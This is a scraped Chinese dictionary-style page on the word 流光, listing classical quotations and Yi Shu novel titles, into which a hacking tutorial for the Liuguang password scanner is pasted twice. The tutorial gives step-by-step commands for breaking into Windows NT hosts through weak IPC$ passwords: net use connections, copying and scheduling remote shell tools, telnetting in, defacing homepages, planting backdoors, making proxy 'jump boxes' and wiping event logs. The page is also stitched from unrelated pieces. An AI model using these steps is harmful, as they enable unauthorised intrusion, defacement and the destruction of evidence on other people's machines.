|
|
| |
|
作者: 亦舒 Yi Shu
COMA
殘酷遊戲
對窗
跟蹤
假期過後
離傢
流光
他人情書
天使
我恨你
新生 |
|
| 時光 |
|
| 總把流光誤。——《儒林外史》 |
|
| 流光易逝 |
|
| 謂福澤流傳至後世。《穀梁傳·僖公十五年》:“德厚者流光,德薄者流卑。” 宋 羅大經 《鶴林玉露》捲六:“若從 孔 孟 治地之法,則仁者必壽,善者必福,清明之志氣如神,厚德之流光寖遠。” 清 錢謙益 《太僕寺畢自嚴祖忠臣加贈大中大夫製》:“酬而劬後之勞,示我流光之報。” |
|
| 流動、閃爍的光彩。 漢 司馬相如 《上林賦》:“應駍聲,擊流光,野盡山窮,囊括其雌雄。”《南史·宋元兇劭傳》:“時主夕臥,見流光相隨,狀若螢火。” |
|
| 特指如水般流瀉的月光。 三國 魏 曹植 《七哀》詩:“明月照高樓,流光正徘徊。” 唐 長孫佐輔 《橫吹麯辭·關山月》:“忽憶秦樓婦,流光應共有。” 清 方文 《秋夜飲顧與治齋中》詩:“清暉在山川,流光及城闕。” |
|
| 指如流水般逝去的時光。 唐 鮑防 《人日陪宣州範中丞傳正與範侍禦傳真宴東峰亭》詩:“流光易去懽難得,莫厭頻頻上此臺。” 宋 宋祁 《浪淘沙·別劉原父》詞:“少年不管,流光如箭,因循不覺韶華換。” 柯靈 《香雪海·春節書紅》:“又是一年過去了,真是流光如駛!” |
|
〈書〉①光陰;歲月:~如箭ㄧ~易逝。
②閃爍流動的光,特指月光。 |
|
流光的破解可分為5大部分:
一、pop3/ftp/…探測
二、ipc探測
三、sql探測
四、高級掃描
五、其它 …
因為開發時間的原因,上面的探測模式略有不同,所以分成了四個部分,本教程說的是第一個部分的探測。後面的探測模式應該屬於流光的高級應用了:)
流光的ipc探測:
一、目的和任務:
1、用流光的ipc探測獲得一臺nt主機的管理權限,並將這臺主機做成一個跳板/代理。
2、學習ipc探測的相關知識。
二、探測流程:
1、你得有流光,我這裏試驗用的是流光2001.for win2000 中文版。for win98的不可以。因為ipc連接功能是nt/ 2000提供的功能。而且流光for 2k 要求你的操作係統得是nt/2000,否則流光啓動會失敗!
什麽是ipc:
ipc是指"interprocess communications",準確的說是ipc$,是默認的在係統啓動時的admin共享。
ipc$是windows nt/2k中特有的遠程網絡登陸功能,它的特點是在同一時間內,兩個ip之間衹允許建立一個連接。
註意,你試圖通過ipc$連接會在eventlog中留下記錄。不管你是否登錄成功。
可不可以通過ipc$暴力破解密碼?當然可以 ! 不過,是不是太笨了點 …
2、首次啓動流光,會看到註册的畫面,具體操作請參考本人第一篇教程。我們在主頁面上可以有幾種方法來通過ipc 探測獲得管理的權限。這裏我們要作的是得到一臺跳板,那麽就可以用命中率高的辦法來探測了(測試一堆ip來得到弱口令)。
在主界面選擇 探測→探測pop3/ftp/nt/sql主機選項,或者直接按ctrl+r。
3、出先了上面的小窗口,輸入我們要破解的ip段,我們輸入了來看看。圖main2我們把“將frontpage主機自動加入http主機列表取消了”。因為我們衹想獲得ipc弱口令,這樣可以加快掃描的速度 :)填入ip,選擇掃描nt/98主機
4、探測中……
(註意如果你要探測的是流光保留的國內的ip段,會被禁止的,也就是探測的時候信息欄出現"ip保留"的字樣)
有遠程主機的管理密碼了,我們剩下的就是想辦法控製它了,有什麽好辦麽? :)有的是 !自己看看工具-菜單下的iis遠程命令:)是不是很簡單呢,我以後在說,今天還是先練習net 命令吧。
黑了他 !
開個dos prompt 執行如下命令,本次用的例子如下圖。
1、 net use 對方ipipc$ "密碼" /user:"用戶名" || 建立遠程連接
2、 copy icmd.exe 對方ipadmin$ || admin$是對方的winnt目錄 :) 這裏文件多。
3、 net time 對方ip || 看看對方的本地時間
4、at 對方ip 啓動程序的時間 啓動程序名 啓動程序的參數 || 用at命令來定時啓動程序,在這裏我們用soon這個程序來做也可以,它可以取代 3/4兩步。
5、 telnet 對方ip 端口 ||
6、輸入pass (如果不是用icmd.exe,或者沒有設置口令就不用了) ||
7、在開個窗口,繼續copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe
如果我們真的想黑了他,衹需要把我們的首頁文件覆蓋目標的首頁就ok了,我們可以通過dir /s default或者dir /s index 來確定對方首頁的為止,一般是在x:interpubwwwroot .
假如首頁文件是default並且在c:interpubwwwroot,這樣:copy default ipc$interpubwwwroot
下面的圖有演示
8、其實黑人傢是很低級並且沒意思的:(,我們最好是物有所有,作成跳板吧,今後幹活方便點:
執行我們copy 過去的ntlm.exe ,取消驗正。在給自己留個後門,比如提升guest的權限,或者其它的後門工具,這類東西多了自己選吧,看看殺手copy的那堆東西 :)
9、還能做成其他的麽 ?
當然了,衹要你有時間,並且願意做,我曾經偷偷的把自己的主頁放到人傢的server上,速度快、空間無限,嘿嘿 :)
10、日志清除,斷開連接 :
執行我們copy 過去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然後在斷開連接:net use ipipc$ /_delete_
流光簡介
流光4.7)一個絶好的ftp、pop3解密工具,界面豪華,功能強大!功能簡介如下:1、用於檢測pop3/ftp主機中用戶密碼安全漏洞。2、163/169雙通。3、多綫程檢測,消除係統中密碼漏洞。4、高效的用戶流模式。5、高效服務器流模式,可同時對多臺pop3/ftp主機進行檢測。6、最多500個綫程探測。7、綫程超時設置,阻塞綫程具有自殺功能,不會影響其他綫程。8、支持10個字典同時檢測。9、檢測設置可作為項目保存。10、取消了國內ip限製而且免費。
流光4.7新增功能:
1、加入了本地模式,在本機運行是不必安裝sensor。
2、sensor掃描臨時結果文件(*.ptr)的尺寸大約減少了10倍。
3、後臺掃描模式時,掃描的結果(*.ptr)可以直接通過附件發送到信箱。
4、sensor的掃描速度加快。
5、減少了sensor異常退出的bug。
6、流光的界面和sensor之間的通訊采用triple-des,密鑰的長度最多可到192bits,保證整個傳輸過程不可監聽。掃描的結果也衹有在密鑰正確的情況下纔可閱讀。
7、修正的控製服務,新的控製服務在升級sensor時不再會失敗。
8、sensor的服務名稱可以任意指定,控製服務和sensor的進程名稱也可以任意指定。
9、支持xp(本地模式),很快會有98/me的版本。 |
|
【拼音】:líu guāng
【釋義】:(1)指光陰;(2)指光彩閃爍;(3)指月光。
【探源】:
(1)李白《古風》:“逝川與流光,飄忽不相待。”
(2)曹丕《濟川賦》:“明珠灼灼而流光。”
(3)曹植《七哀》詩:“明月照高樓,流光正徘徊。”
流光的破解可分為5大部分:
一、POP3/FTP/…探測
二、IPC探測
三、SQL探測
四、高級掃描
五、其它 …
因為開發時間的原因,上面的探測模式略有不同,所以分成了四個部分,本教程說的是第一個部分的探測。後面的探測模式應該屬於流光的高級應用了:)
流光的IPC探測:
一、目的和任務:
1、用流光的IPC探測獲得一臺NT主機的管理權限,並將這臺主機做成一個跳板/代理。
2、學習IPC探測的相關知識。
二、探測流程:
1、你得有流光,我這裏試驗用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因為IPC連接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作係統得是NT/2000,否則流光啓動會失敗!
什麽是IPC:
IPC是指"InterProcess Communications",準確的說是ipc$,是默認的在係統啓動時的admin共享。
IPC$是Windows NT/2K中特有的遠程網絡登陸功能,它的特點是在同一時間內,兩個IP之間衹允許建立一個連接。
註意,你試圖通過IPC$連接會在EventLog中留下記錄。不管你是否登錄成功。
可不可以通過IPC$暴力破解密碼?當然可以 ! 不過,是不是太笨了點 …
2、首次啓動流光,會看到註册的畫面,具體操作請參考本人第一篇教程。我們在主頁面上可以有幾種方法來通過IPC 探測獲得管理的權限。這裏我們要作的是得到一臺跳板,那麽就可以用命中率高的辦法來探測了(測試一堆IP來得到弱口令)。
在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。
3、出先了上面的小窗口,輸入我們要破解的IP段,我們輸入了來看看。圖main2我們把“將FrontPage主機自動加入HTTP主機列表取消了”。因為我們衹想獲得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機
4、探測中……
(註意如果你要探測的是流光保留的國內的IP段,會被禁止的,也就是探測的時候信息欄出現"IP保留"的字樣)
有遠程主機的管理密碼了,我們剩下的就是想辦法控製它了,有什麽好辦麽? :)有的是 !自己看看工具-菜單下的IIS遠程命令:)是不是很簡單呢,我以後在說,今天還是先練習net 命令吧。
黑了他 !
開個dos prompt 執行如下命令,本次用的例子如下圖。
1、 net use 對方ipipc$ "密碼" /user:"用戶名" || 建立遠程連接
2、 copy icmd.exe 對方ipadmin$ || admin$是對方的winnt目錄 :) 這裏文件多。
3、 net time 對方IP || 看看對方的本地時間
4、at 對方ip 啓動程序的時間 啓動程序名 啓動程序的參數 || 用at命令來定時啓動程序,在這裏我們用soon這個程序來做也可以,它可以取代 3/4兩步。
5、 telnet 對方ip 端口 ||
6、輸入pass (如果不是用icmd.exe,或者沒有設置口令就不用了) ||
7、在開個窗口,繼續copy 我們用的東西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe
如果我們真的想黑了他,衹需要把我們的首頁文件覆蓋目標的首頁就ok了,我們可以通過dir /s default.htm或者dir /s index.htm 來確定對方首頁的為止,一般是在X:interpubwwwroot .
假如首頁文件是default.htm並且在c:interpubwwwroot,這樣:copy default.htm ipc$interpubwwwroot
下面的圖有演示
8、其實黑人傢是很低級並且沒意思的:(,我們最好是物有所有,作成跳板吧,今後幹活方便點:
執行我們copy 過去的ntlm.exe ,取消驗正。在給自己留個後門,比如提升guest的權限,或者其它的後門工具,這類東西多了自己選吧,看看殺手copy的那堆東西 :)
9、還能做成其他的麽 ?
當然了,衹要你有時間,並且願意做,我曾經偷偷的把自己的主頁放到人傢的server上,速度快、空間無限,嘿嘿 :)
10、日志清除,斷開連接 :
執行我們copy 過去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然後在斷開連接:net use ipipc$ /delete
流光簡介
流光4.7)一個絶好的ftp、pop3解密工具,界面豪華,功能強大!功能簡介如下:1、用於檢測POP3/FTP主機中用戶密碼安全漏洞。2、163/169雙通。3、多綫程檢測,消除係統中密碼漏洞。4、高效的用戶流模式。5、高效服務器流模式,可同時對多臺POP3/FTP主機進行檢測。6、最多500個綫程探測。7、綫程超時設置,阻塞綫程具有自殺功能,不會影響其他綫程。8、支持10個字典同時檢測。9、檢測設置可作為項目保存。10、取消了國內IP限製而且免費。
流光4.7新增功能:
1、加入了本地模式,在本機運行是不必安裝Sensor。
2、Sensor掃描臨時結果文件(*.PTR)的尺寸大約減少了10倍。
3、後臺掃描模式時,掃描的結果(*.PTR)可以直接通過附件發送到信箱。
4、Sensor的掃描速度加快。
5、減少了Sensor異常退出的BUG。
6、流光的界面和Sensor之間的通訊采用Triple-DES,密鑰的長度最多可到192bits,保證整個傳輸過程不可監聽。掃描的結果也衹有在密鑰正確的情況下纔可閱讀。
7、修正的控製服務,新的控製服務在升級Sensor時不再會失敗。
8、Sensor的服務名稱可以任意指定,控製服務和Sensor的進程名稱也可以任意指定。
9、支持XP(本地模式),很快會有98/ME的版本。 |
|
- : Liuguang
- n.: streamer, time
|
|
| 流光村 |
|
|